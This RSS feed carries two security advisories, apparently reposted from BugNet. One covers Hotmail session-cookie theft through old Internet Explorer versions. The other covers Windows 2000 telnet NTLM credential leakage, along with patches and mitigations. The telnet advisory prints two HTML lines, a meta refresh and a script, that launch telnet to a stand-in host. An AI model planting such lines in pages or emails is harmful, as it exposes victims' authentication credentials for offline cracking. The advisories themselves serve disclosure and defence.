<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Real-time AntiSpam protection, automated and self-managed content filtering &#187; hacker</title>
	<atom:link href="http://veriat.com/tag/hacker/feed" rel="self" type="application/rss+xml" />
	<link>http://veriat.com</link>
	<description></description>
	<lastBuildDate>Thu, 27 May 2010 23:10:07 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Old IE Means New Hotmail Vulnerability</title>
		<link>http://veriat.com/old-ie-means-new-hotmail-vulnerability.html</link>
		<comments>http://veriat.com/old-ie-means-new-hotmail-vulnerability.html#comments</comments>
		<pubDate>Tue, 18 Aug 2009 10:57:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Net Progress]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[BugNet]]></category>
		<category><![CDATA[dialup connection]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[Hotmail]]></category>
		<category><![CDATA[Hotmail session]]></category>
		<category><![CDATA[New Hotmail Vulnerability]]></category>

		<guid isPermaLink="false">http://veriat.com/?p=315</guid>
		<description><![CDATA[Hotmail Users Need to Update Browser
For many people, the axiom, &#8220;If it ain&#8217;t broke, don&#8217;t fix it&#8221;, is their modus operandi. With so many other things to worry about, updating a browser that seems to be working fine just isn&#8217;t a high priority. However, a recently discovered security bug in Hotmail may serve as a [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Hotmail Users Need to Update Browser</strong></p>
<p>For many people, the axiom, &#8220;If it ain&#8217;t broke, don&#8217;t fix it&#8221;, is their modus operandi. With so many other things to worry about, updating a browser that seems to be working fine just isn&#8217;t a high priority. However, a recently discovered security bug in Hotmail may serve as a wakeup call to all Internet Explorer 4.x and 5.0 users. BugNet has verified a security vulnerability that would allow a malicious user to usurp control of someone else&#8217;s Hotmail account, allowing the hacker to read and to send e-mail from that account. Because this security hole can be thwarted by upgrading IE, we recommend that all Hotmail users verify that they are running the most current version of the Microsoft browser.?<span id="more-315"></span></p>
<p>With testing provided by KeyLabs, BugNet was able to verify this Hotmail vulnerability reported by an Internet developer in Denizli, Turkey. Alp Sinan, an e-commerce and security consultant, supplied demonstration code that allowed us to gain access to test e-mail accounts on the Hotmail server. The exploit involves using a previously reported security hole in IE (&#8221;Unauthorized Cookie Access&#8221;) to steal an unsuspecting user&#8217;s Hotmail cookie. That cookie is then used to authenticate the malicious user to the victim&#8217;s Hotmail account.</p>
<p>While newer versions of IE prevent a hacker from stealing cookies, there are still a lot of Internet users that use the default browser that came with the Windows 95 and Windows 98. For many, the size of the download has prevented them from upgrading over a dialup connection.</p>
<p>Since Microsoft has issued Service Packs and Upgrades for the &#8220;Unauthorized Cookie Access&#8221; bug, this leaves the rest of the blame with Hotmail for their lax security and authentication procedures. Hotmail&#8217;s authentication is built on session cookies. When a user logs in, Hotmail sends the user an encoded cookie that the browser uses to authenticate with the Hotmail server throughout the life of the Hotmail session. If the user can be tricked into sending this session cookie to a hacker, then the hacker could also gain access to the victim&#8217;s account. The hacker might do this by enticing the user to click on a carefully constructed Internet link within an e-mail or on a web page.</p>
<p>BugNet informed Hotmail of the vulnerability and included sample code. To date we have not received any feedback. Until Hotmail changes it&#8217;s security mechanism, the only fix is to update IE to versions 5.1 with Service Pack 1, or to upgrade IE to version 5.5. Both of these are freely downloadable from Microsoft&#8217;s site. Stay tuned for more information as it becomes available.</p>
]]></content:encoded>
			<wfw:commentRss>http://veriat.com/old-ie-means-new-hotmail-vulnerability.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows Authentication Exposes Telnet</title>
		<link>http://veriat.com/windows-authentication-exposes-telnet.html</link>
		<comments>http://veriat.com/windows-authentication-exposes-telnet.html#comments</comments>
		<pubDate>Tue, 18 Aug 2009 10:52:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Net Progress]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[NTLM]]></category>
		<category><![CDATA[NTLM-enabled telnet servers]]></category>
		<category><![CDATA[Windows Authentication]]></category>
		<category><![CDATA[Windows Authentication Exposes Telnet]]></category>

		<guid isPermaLink="false">http://veriat.com/?p=313</guid>
		<description><![CDATA[Telnet, the mainstay of remote management for decades, got a feature enhancement in Windows 2000 that might streamline the logon process, but could also expose user authentication credentials to a hacker. Microsoft has recently released a patch that eliminates a security vulnerability in Windows 2000 telnet client. The bug could allow a malicious user to [...]]]></description>
			<content:encoded><![CDATA[<p>Telnet, the mainstay of remote management for decades, got a feature enhancement in Windows 2000 that might streamline the logon process, but could also expose user authentication credentials to a hacker. Microsoft has recently released a patch that eliminates a security vulnerability in Windows 2000 telnet client. The bug could allow a malicious user to trick an unsuspecting victim into automatically starting a telnet session with the hacker&#8217;s telnet server, thereby transmitting critical user authentication information to that server.</p>
<p>With the help of KeyLabs, BugNet was able to reproduce this bug that affects all Windows 2000 users. The vulnerability occurs because of a new authentication feature added to Windows 2000&#8217;s telnet.exe. <span id="more-313"></span>The feature lets telnet automatically authenticate with NTLM-enabled telnet servers (i.e. Windows 2000 Telnet Servers). NTLM is the standard authentication used by Windows products. It uses a challenge/response mechanism to confirm a user&#8217;s identity without sending the password across the wire.</p>
<p><strong>Telnet or not to telnet? </strong></p>
<p>The problem is that NTLM authentication happens automatically and by default whenever telnet is launched. So if a malicious user could entice a victim into initiating a telnet session with a tricked server, then the malicious user could capture the victim&#8217;s authentication credentials. Capturing the credentials by itself does not put the victim&#8217;s computer at risk, nor does it allow the hacker to gain access to the victim&#8217;s computer. It does, however, give the hacker enough information to launch an off-line brute force attack aimed at ascertaining the plain-text password. Because this attack is handled off-line, the user and the system administrator are none the wiser, and the malicious user could take as much time as needed to get the password.</p>
<p>This begs the question, how might a malicious user entice a victim into establishing a remote telnet session? The answer is quite simple. Because pretty much all versions of Internet Explorer and Outlook will launch telnet when they encounter &#8220;telnet://hostname&#8221; in a carefully constructed HTML reference, the malicious user would only have to create a reference on a web page or in an e-mail message. The referenced command could be as simple as:</p>
<p>&lt;meta http-equiv=&#8221;refresh&#8221; content=&#8221;0;URL=telnet://hostname&#8221;&gt;</p>
<p>Or, if you prefer JavaScript:</p>
<p>&lt;script&gt;window.open(&#8221;telnet://target&#8221;)&lt;/script&gt;</p>
<p>Despite the insidiousness of this vulnerability, there are some simple solutions. First, you can install the Microsoft patch. The fix is small and makes for a quick download. Install the patch by running the downloaded executable. No other user intervention is required, except for the mandatory system restart. So when installing the patch on a server, wait until restarting the server will have the least impact on the users.</p>
<p>Unlike Windows 9x and Windows NT, Windows 2000 is the only version that has this problem. Once installed, the patch will warn the user whenever telnet tries to authenticate outside the &#8220;Trusted sites&#8221; or the &#8220;Local Intranet&#8221; zones. The warning reads like this: &#8220;You are about send your password information to a remote computer in the Internet zone. This might be unsafe. Do you want to send anyway(y/n):&#8221;</p>
<p>The second method for protecting a Windows 2000 system running telnet.exe involves disabling NTLM authentication on the telnet client. A Microsoft security bulletin on this vulnerability explains how to disable all NTLM telnet authentications. Issuing the command &#8220;unset ntlm&#8221; from the telnet command line will prevent telnet from automatically authenticating via NTLM. To check the status of telnet authentication, enter the command &#8220;display&#8221; from the telnet command prompt. If the &#8220;Not Auth (NTLM)&#8221; is displayed, then Microsoft&#8217;s challenge/response is turned off.</p>
<p>Telnet has been around for a while. With some companies, telnet is the primary tool for managing network devices like servers and routers. Based on our test, BugNet recommends that all Windows 2000 users consider installing this patch.</p>
]]></content:encoded>
			<wfw:commentRss>http://veriat.com/windows-authentication-exposes-telnet.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

